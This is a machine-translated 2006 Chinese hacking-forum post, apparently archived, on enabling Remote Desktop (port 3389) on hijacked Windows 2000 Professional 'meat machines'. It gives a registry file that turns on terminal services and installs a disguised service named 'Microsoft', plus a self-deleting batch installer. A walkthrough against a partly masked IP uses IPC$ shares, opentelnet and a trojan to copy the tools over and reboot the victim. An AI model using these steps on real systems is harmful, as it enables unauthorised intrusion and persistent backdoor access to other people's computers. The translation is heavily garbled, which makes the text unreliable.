In win Pro lower opening 3 3 8 9 up! - Vulnerability warning-the black bar safety net

ID MYHACK58:62200610272
Type myhack58
Reporter 佚名
Modified 2006-07-08T00:00:00


This post go to Banyan brother forum that is not original is unclear In win2000 Professional Edition installed 3 3 8 9 Terminal Services It is well known windows2000 profassional does not support 3 3 8 9 Terminal Services, so if we found to give the administrator password of the meat machine is this version, only to give up the installation of Terminal Services the idea. But now we can already in the profassional version install Terminal Services! The method is as follows: 1. The profassional version is changed to server version 2. Install Terminal Services

With regard to the installation of Terminal Services the details of the network, there have been many excellent articles are not repeated here.

Below will talk about how to be profassional version is changed to server version:

Principle: in fact, windows 2 0 0 0 the various versions all using the same program, Dynamic Link Library, among them the biggest difference is in the registry. windows2000 triple disc is proof of that. So as long as the profassional edition of the registry of projects related to server and above versions, you can profassional version install Terminal Services.

Now 3am Laboratories has been changing the win2000 version method made a very easy-to-use software: NTSwitch, let us be free to quickly change the version. This software can be in the small Phoenix center download to, the download address is a URL

May be due to Microsoft's pressure, the 3am Laboratories have this software from its home page to remove, we faster download!

The remote version of the transform of the specific implementation methods:

Act 1: The 1 in the remote meat machine run on to support the graphical interface of a remote control program such as: a glacier, PcAnyWhere, etc. 2 Remote Control, download and run the NTSwitch to change the version 3 Installation 3 3 8 9 Terminal Services

This method is very convenient, the technical requirements to a minimum. But the operation process each other is all you can see, very dangerous!

Method 2: 1 own The your own local win2000 professional changed to win2000 server Edition, the use of the registry comparison software comparison of the version before and after transformation registry difference. The difference is made into a chang. the reg file. 2 The use of the resulting meat machine administrator password, open the meat machine the Telnet service. 3 Telnet on meat machine, 利用regedit.exe /s chang. the reg command, the remote registry changes, enabling remote win2000 version of the transform.

This method requires some experience, but the operation is very safe. And you can use the“lost vb”method further installation 3 3 8 9 Terminal Services.

The following is a“stray vb”Installation 3 3 8 9 terminal service method

======================== First, we make the open 3 3 8 9 tool First put the following registry contents copy a copy, Save As 3 3 8 9. reg registry file Registry contents: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftwindowscurrentversionnetcache] "Enabled"="0" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftwindows NTCurrentVersionWinlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINESOFTWAREPoliciesmicrosoftwindowsinstaller] "EnableAdminTSRemote"=dword:0 0 0 0 0 0 0 1 [HKEY_LOCAL_MACHINESYSTEMCurrentControlsetcontrolterminal Server] "TSEnabled"=dword:0 0 0 0 0 0 0 1 [HKEY_LOCAL_MACHINESYSTEMCurrentControlsetservicestermdd] "Start"=dword:0 0 0 0 0 0 0 2 [HKEY_USERS. DEFAULTKeyboard LayoutToggle] "Hotkey"="1" [HKEY_LOCAL_MACHINESYSTEMCurrentControlsetservicessecuservice] "Start"=dword:0 0 0 0 0 0 0 2 "ErrorControl"=dword:0 0 0 0 0 0 0 1 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6 d,0 0,5 2,0 0,6 f,0 0,6 f,0 0, 74,00,25,00,5 c,0 0,5 3,0 0,7 9,0 0,7 3,0 0,7 4,0 0,6 5,0 0,6 d,0 0,3 3,0 0,3 2,0 0,5 c,0 0,6 5, 00,76,00,65,00,6 e,0 0,7 4,0 0,6 c,0 0,6 f,0 0,6 7,0 0,2 e,0 0,6 5,0 0,7 8,0 0,6 5,0 0,0 0,0 0 "ObjectName"="LocalSystem" "Type"=dword:0 0 0 0 0 0 1 0 "Description"="Microsoft" "DisplayName"="Microsoft" Then put the following content is saved as a batch file 3 3 8 9. bat To install the batch content: copy termsrv.exe eventlog.exe regedit.exe /s 3 3 8 9. reg del 3 3 8 9. reg del 3389.exe del 3 3 8 9. bat Using winrar make into an exe self-extracting package

61.188.. user:administrato pass:empty First use the tool letmein determine itsoperating system letmein \ip-all-d TsInternetUser (TsInternetUser)this is 2 0 0 0 the end-user, may now determine which is the 2000server. Then use the terminal login software take a look at his 3 3 8 9 is not already open a free of the trouble and toss It should be not turned on. Establish ipc connection copy tools of the past net use \ipipc$ "password" /user:name copy the file \ipadmin$system32 With opentelnet open the other side of the telnet opentelnet \ip name pass 1 9 9 Used to telnet into Into the other side of the winntsystem32 Directory 解压缩 3389.exe Run the installation batch 3 3 8 9. bat Now we have the other side re-starting it, with a reboot We use the ping command to monitor His on-line situation, and so he off the Assembly line, Oh under, and come up, do not panic even, 3 3 8 9, etc. will be good, the other machine is a bit slow Saw it, turned success!